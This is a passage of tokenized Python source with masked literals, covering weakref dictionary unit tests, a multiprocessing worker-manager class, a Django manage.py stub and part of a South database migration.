o , None , "<STR_LIT:abc>" , "<STR_LIT>" ) <EOL> self . assertEqual ( r . slot1 , "<STR_LIT:abc>" ) <EOL> self . assertEqual ( r . slot2 , "<STR_LIT>" ) <EOL> self . assertEqual ( r . meth ( ) , "<STR_LIT>" ) <EOL> self . failIf ( hasattr ( r , "<STR_LIT>" ) ) <EOL> class Object : <EOL> def __init__ ( self , arg ) : <EOL> self . arg = arg <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . arg <EOL> class MappingTestCase ( TestBase ) : <EOL> COUNT = <NUM_LIT:10> <EOL> def test_weak_values ( self ) : <EOL> dict , objects = self . make_weak_valued_dict ( ) <EOL> for o in objects : <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:1> , <EOL> "<STR_LIT>" % o ) <EOL> self . assert_ ( o is dict [ o . 
arg ] , <EOL> "<STR_LIT>" ) <EOL> items1 = dict . items ( ) <EOL> items2 = dict . copy ( ) . items ( ) <EOL> items1 . sort ( ) <EOL> items2 . sort ( ) <EOL> self . assert_ ( items1 == items2 , <EOL> "<STR_LIT>" ) <EOL> del items1 , items2 <EOL> self . assert_ ( len ( dict ) == self . COUNT ) <EOL> del objects [ <NUM_LIT:0> ] <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == ( self . COUNT - <NUM_LIT:1> ) , <EOL> "<STR_LIT>" ) <EOL> del objects , o <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> dict = weakref . WeakValueDictionary ( ) <EOL> self . assertRaises ( KeyError , dict . __getitem__ , <NUM_LIT:1> ) <EOL> dict [ <NUM_LIT:2> ] = C ( ) <EOL> extra_collect ( ) <EOL> self . assertRaises ( KeyError , dict . __getitem__ , <NUM_LIT:2> ) <EOL> def test_weak_keys ( self ) : <EOL> dict , objects = self . make_weak_keyed_dict ( ) <EOL> for o in objects : <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:1> , <EOL> "<STR_LIT>" % o ) <EOL> self . assert_ ( o . arg is dict [ o ] , <EOL> "<STR_LIT>" ) <EOL> items1 = dict . items ( ) <EOL> items2 = dict . copy ( ) . items ( ) <EOL> self . assert_ ( set ( items1 ) == set ( items2 ) , <EOL> "<STR_LIT>" ) <EOL> del items1 , items2 <EOL> self . assert_ ( len ( dict ) == self . COUNT ) <EOL> del objects [ <NUM_LIT:0> ] <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == ( self . COUNT - <NUM_LIT:1> ) , <EOL> "<STR_LIT>" ) <EOL> del objects , o <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> o = Object ( <NUM_LIT> ) <EOL> dict [ o ] = "<STR_LIT>" <EOL> self . assert_ ( dict . has_key ( o ) ) <EOL> self . assert_ ( not dict . has_key ( <NUM_LIT> ) ) <EOL> def test_weak_keyed_iters ( self ) : <EOL> dict , objects = self . make_weak_keyed_dict ( ) <EOL> self . check_iters ( dict ) <EOL> refs = dict . keyrefs ( ) <EOL> self . 
assertEqual ( len ( refs ) , len ( objects ) ) <EOL> objects2 = list ( objects ) <EOL> for wr in refs : <EOL> ob = wr ( ) <EOL> self . assert_ ( dict . has_key ( ob ) ) <EOL> self . assert_ ( ob in dict ) <EOL> self . assertEqual ( ob . arg , dict [ ob ] ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> objects2 = list ( objects ) <EOL> self . assertEqual ( len ( list ( dict . iterkeyrefs ( ) ) ) , len ( objects ) ) <EOL> for wr in dict . iterkeyrefs ( ) : <EOL> ob = wr ( ) <EOL> self . assert_ ( dict . has_key ( ob ) ) <EOL> self . assert_ ( ob in dict ) <EOL> self . assertEqual ( ob . arg , dict [ ob ] ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> def test_weak_valued_iters ( self ) : <EOL> dict , objects = self . make_weak_valued_dict ( ) <EOL> self . check_iters ( dict ) <EOL> refs = dict . valuerefs ( ) <EOL> self . assertEqual ( len ( refs ) , len ( objects ) ) <EOL> objects2 = list ( objects ) <EOL> for wr in refs : <EOL> ob = wr ( ) <EOL> self . assertEqual ( ob , dict [ ob . arg ] ) <EOL> self . assertEqual ( ob . arg , dict [ ob . arg ] . arg ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> objects2 = list ( objects ) <EOL> self . assertEqual ( len ( list ( dict . itervaluerefs ( ) ) ) , len ( objects ) ) <EOL> for wr in dict . itervaluerefs ( ) : <EOL> ob = wr ( ) <EOL> self . assertEqual ( ob , dict [ ob . arg ] ) <EOL> self . assertEqual ( ob . arg , dict [ ob . arg ] . arg ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> def check_iters ( self , dict ) : <EOL> items = dict . items ( ) <EOL> for item in dict . iteritems ( ) : <EOL> items . remove ( item ) <EOL> self . assert_ ( len ( items ) == <NUM_LIT:0> , "<STR_LIT>" ) <EOL> keys = dict . keys ( ) <EOL> for k in dict : <EOL> keys . remove ( k ) <EOL> self . 
assert_ ( len ( keys ) == <NUM_LIT:0> , "<STR_LIT>" ) <EOL> keys = dict . keys ( ) <EOL> for k in dict . iterkeys ( ) : <EOL> keys . remove ( k ) <EOL> self . assert_ ( len ( keys ) == <NUM_LIT:0> , "<STR_LIT>" ) <EOL> values = dict . values ( ) <EOL> for v in dict . itervalues ( ) : <EOL> values . remove ( v ) <EOL> self . assert_ ( len ( values ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> def test_make_weak_keyed_dict_from_dict ( self ) : <EOL> o = Object ( <NUM_LIT:3> ) <EOL> dict = weakref . WeakKeyDictionary ( { o : <NUM_LIT> } ) <EOL> self . assert_ ( dict [ o ] == <NUM_LIT> ) <EOL> def test_make_weak_keyed_dict_from_weak_keyed_dict ( self ) : <EOL> o = Object ( <NUM_LIT:3> ) <EOL> dict = weakref . WeakKeyDictionary ( { o : <NUM_LIT> } ) <EOL> dict2 = weakref . WeakKeyDictionary ( dict ) <EOL> self . assert_ ( dict [ o ] == <NUM_LIT> ) <EOL> def make_weak_keyed_dict ( self ) : <EOL> dict = weakref . WeakKeyDictionary ( ) <EOL> objects = map ( Object , range ( self . COUNT ) ) <EOL> for o in objects : <EOL> dict [ o ] = o . arg <EOL> return dict , objects <EOL> def make_weak_valued_dict ( self ) : <EOL> dict = weakref . WeakValueDictionary ( ) <EOL> objects = map ( Object , range ( self . COUNT ) ) <EOL> for o in objects : <EOL> dict [ o . arg ] = o <EOL> return dict , objects <EOL> def check_popitem ( self , klass , key1 , value1 , key2 , value2 ) : <EOL> weakdict = klass ( ) <EOL> weakdict [ key1 ] = value1 <EOL> weakdict [ key2 ] = value2 <EOL> self . assert_ ( len ( weakdict ) == <NUM_LIT:2> ) <EOL> k , v = weakdict . popitem ( ) <EOL> self . assert_ ( len ( weakdict ) == <NUM_LIT:1> ) <EOL> if k is key1 : <EOL> self . assert_ ( v is value1 ) <EOL> else : <EOL> self . assert_ ( v is value2 ) <EOL> k , v = weakdict . popitem ( ) <EOL> self . assert_ ( len ( weakdict ) == <NUM_LIT:0> ) <EOL> if k is key1 : <EOL> self . assert_ ( v is value1 ) <EOL> else : <EOL> self . assert_ ( v is value2 ) <EOL> def test_weak_valued_dict_popitem ( self ) : <EOL> self . 
check_popitem ( weakref . WeakValueDictionary , <EOL> "<STR_LIT>" , C ( ) , "<STR_LIT>" , C ( ) ) <EOL> def test_weak_keyed_dict_popitem ( self ) : <EOL> self . check_popitem ( weakref . WeakKeyDictionary , <EOL> C ( ) , "<STR_LIT>" , C ( ) , "<STR_LIT>" ) <EOL> def check_setdefault ( self , klass , key , value1 , value2 ) : <EOL> self . assert_ ( value1 is not value2 , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> weakdict = klass ( ) <EOL> o = weakdict . setdefault ( key , value1 ) <EOL> self . assert_ ( o is value1 ) <EOL> self . assert_ ( weakdict . has_key ( key ) ) <EOL> self . assert_ ( weakdict . get ( key ) is value1 ) <EOL> self . assert_ ( weakdict [ key ] is value1 ) <EOL> o = weakdict . setdefault ( key , value2 ) <EOL> self . assert_ ( o is value1 ) <EOL> self . assert_ ( weakdict . has_key ( key ) ) <EOL> self . assert_ ( weakdict . get ( key ) is value1 ) <EOL> self . assert_ ( weakdict [ key ] is value1 ) <EOL> def test_weak_valued_dict_setdefault ( self ) : <EOL> self . check_setdefault ( weakref . WeakValueDictionary , <EOL> "<STR_LIT:key>" , C ( ) , C ( ) ) <EOL> def test_weak_keyed_dict_setdefault ( self ) : <EOL> self . check_setdefault ( weakref . WeakKeyDictionary , <EOL> C ( ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def check_update ( self , klass , dict ) : <EOL> weakdict = klass ( ) <EOL> weakdict . update ( dict ) <EOL> self . assert_ ( len ( weakdict ) == len ( dict ) ) <EOL> for k in weakdict . keys ( ) : <EOL> self . assert_ ( dict . has_key ( k ) , <EOL> "<STR_LIT>" ) <EOL> v = dict . get ( k ) <EOL> self . assert_ ( v is weakdict [ k ] ) <EOL> self . assert_ ( v is weakdict . get ( k ) ) <EOL> for k in dict . keys ( ) : <EOL> self . assert_ ( weakdict . has_key ( k ) , <EOL> "<STR_LIT>" ) <EOL> v = dict [ k ] <EOL> self . assert_ ( v is weakdict [ k ] ) <EOL> self . assert_ ( v is weakdict . get ( k ) ) <EOL> def test_weak_valued_dict_update ( self ) : <EOL> self . check_update ( weakref . 
WeakValueDictionary , <EOL> { <NUM_LIT:1> : C ( ) , '<STR_LIT:a>' : C ( ) , C ( ) : C ( ) } ) <EOL> def test_weak_keyed_dict_update ( self ) : <EOL> self . check_update ( weakref . WeakKeyDictionary , <EOL> { C ( ) : <NUM_LIT:1> , C ( ) : <NUM_LIT:2> , C ( ) : <NUM_LIT:3> } ) <EOL> def test_weak_keyed_delitem ( self ) : <EOL> d = weakref . WeakKeyDictionary ( ) <EOL> o1 = Object ( '<STR_LIT:1>' ) <EOL> o2 = Object ( '<STR_LIT:2>' ) <EOL> d [ o1 ] = '<STR_LIT>' <EOL> d [ o2 ] = '<STR_LIT>' <EOL> self . assert_ ( len ( d ) == <NUM_LIT:2> ) <EOL> del d [ o1 ] <EOL> self . assert_ ( len ( d ) == <NUM_LIT:1> ) <EOL> self . assert_ ( d . keys ( ) == [ o2 ] ) <EOL> def test_weak_valued_delitem ( self ) : <EOL> d = weakref . WeakValueDictionary ( ) <EOL> o1 = Object ( '<STR_LIT:1>' ) <EOL> o2 = Object ( '<STR_LIT:2>' ) <EOL> d [ '<STR_LIT>' ] = o1 <EOL> d [ '<STR_LIT>' ] = o2 <EOL> self . assert_ ( len ( d ) == <NUM_LIT:2> ) <EOL> del d [ '<STR_LIT>' ] <EOL> self . assert_ ( len ( d ) == <NUM_LIT:1> ) <EOL> self . assert_ ( d . items ( ) == [ ( '<STR_LIT>' , o2 ) ] ) <EOL> def test_weak_keyed_bad_delitem ( self ) : <EOL> d = weakref . WeakKeyDictionary ( ) <EOL> o = Object ( '<STR_LIT:1>' ) <EOL> self . assertRaises ( KeyError , d . __delitem__ , o ) <EOL> self . assertRaises ( KeyError , d . __getitem__ , o ) <EOL> self . assertRaises ( TypeError , d . __delitem__ , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , d . __getitem__ , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , d . __setitem__ , <NUM_LIT> , <NUM_LIT> ) <EOL> def test_weak_keyed_cascading_deletes ( self ) : <EOL> d = weakref . WeakKeyDictionary ( ) <EOL> mutate = False <EOL> class C ( object ) : <EOL> def __init__ ( self , i ) : <EOL> self . value = i <EOL> def __hash__ ( self ) : <EOL> return hash ( self . value ) <EOL> def __eq__ ( self , other ) : <EOL> if mutate : <EOL> del objs [ - <NUM_LIT:1> ] <EOL> return self . value == other . 
value <EOL> objs = [ C ( i ) for i in range ( <NUM_LIT:4> ) ] <EOL> for o in objs : <EOL> d [ o ] = o . value <EOL> del o <EOL> objs = d . keys ( ) <EOL> objs . reverse ( ) <EOL> mutate = True <EOL> count = <NUM_LIT:0> <EOL> for o in objs : <EOL> count += <NUM_LIT:1> <EOL> del d [ o ] <EOL> self . assertEqual ( len ( d ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( count , <NUM_LIT:2> ) <EOL> from test import mapping_tests <EOL> class WeakValueDictionaryTestCase ( mapping_tests . BasicTestMappingProtocol ) : <EOL> """<STR_LIT>""" <EOL> __ref = { "<STR_LIT>" : Object ( <NUM_LIT:1> ) , "<STR_LIT>" : Object ( <NUM_LIT:2> ) , "<STR_LIT>" : Object ( <NUM_LIT:3> ) } <EOL> type2test = weakref . WeakValueDictionary <EOL> def _reference ( self ) : <EOL> return self . __ref . copy ( ) <EOL> class WeakKeyDictionaryTestCase ( mapping_tests . BasicTestMappingProtocol ) : <EOL> """<STR_LIT>""" <EOL> __ref = { Object ( "<STR_LIT>" ) : <NUM_LIT:1> , Object ( "<STR_LIT>" ) : <NUM_LIT:2> , Object ( "<STR_LIT>" ) : <NUM_LIT:3> } <EOL> type2test = weakref . WeakKeyDictionary <EOL> def _reference ( self ) : <EOL> return self . __ref . copy ( ) <EOL> libreftest = """<STR_LIT>""" <EOL> __test__ = { '<STR_LIT>' : libreftest } <EOL> def test_main ( ) : <EOL> if test_support . is_jython : <EOL> del ReferencesTestCase . test_callback_in_cycle_resurrection <EOL> del ReferencesTestCase . test_callbacks_on_callback <EOL> del MappingTestCase . test_weak_keyed_bad_delitem <EOL> del MappingTestCase . test_weak_keyed_cascading_deletes <EOL> test_support . run_unittest ( <EOL> ReferencesTestCase , <EOL> MappingTestCase , <EOL> WeakValueDictionaryTestCase , <EOL> WeakKeyDictionaryTestCase , <EOL> ) <EOL> test_support . run_doctest ( sys . modules [ __name__ ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import signal <EOL> import time <EOL> import sys <EOL> import multiprocessing <EOL> import inspect <EOL> import traceback <EOL> import logging <EOL> LOGGER = logging . getLogger ( __name__ ) <EOL> class ServiceManager ( object ) : <EOL> def __init__ ( self , worker_cls , num_workers = <NUM_LIT:2> ) : <EOL> if not ( inspect . isclass ( worker_cls ) and issubclass ( worker_cls , multiprocessing . Process ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . workers = [ ] <EOL> self . num_workers = num_workers <EOL> self . worker_cls = worker_cls <EOL> self . running = False <EOL> signal . signal ( signal . SIGINT , self . stop ) <EOL> signal . signal ( signal . SIGTERM , self . stop ) <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . running = True <EOL> LOGGER . info ( "<STR_LIT>" ) <EOL> try : <EOL> while self . running : <EOL> if len ( self . workers ) < self . num_workers : <EOL> worker = self . worker_cls ( * args , ** kwargs ) <EOL> worker . start ( ) <EOL> self . workers . append ( worker ) <EOL> else : <EOL> for worker in self . workers : <EOL> if not worker . is_alive ( ) : <EOL> worker . shutdown ( ) <EOL> self . workers . remove ( worker ) <EOL> worker . terminate ( ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> except KeyboardInterrupt : <EOL> self . stop ( ) <EOL> except Exception as e : <EOL> LOGGER . exception ( str ( e ) ) <EOL> traceback . print_exc ( file = sys . stdout ) <EOL> self . stop ( ) <EOL> def stop ( self , signum = None , frame = None ) : <EOL> self . running = False <EOL> LOGGER . info ( "<STR_LIT>" ) <EOL> for worker in self . workers : <EOL> LOGGER . info ( "<STR_LIT>" + worker . name ) <EOL> worker . shutdown ( ) <EOL> worker . terminate ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def is_running ( self ) : <EOL> return self . running </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> from south . utils import datetime_utils as datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) , <EOL> keep_default = False ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : 
'<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1.0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1.0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : 
u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ 
] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , 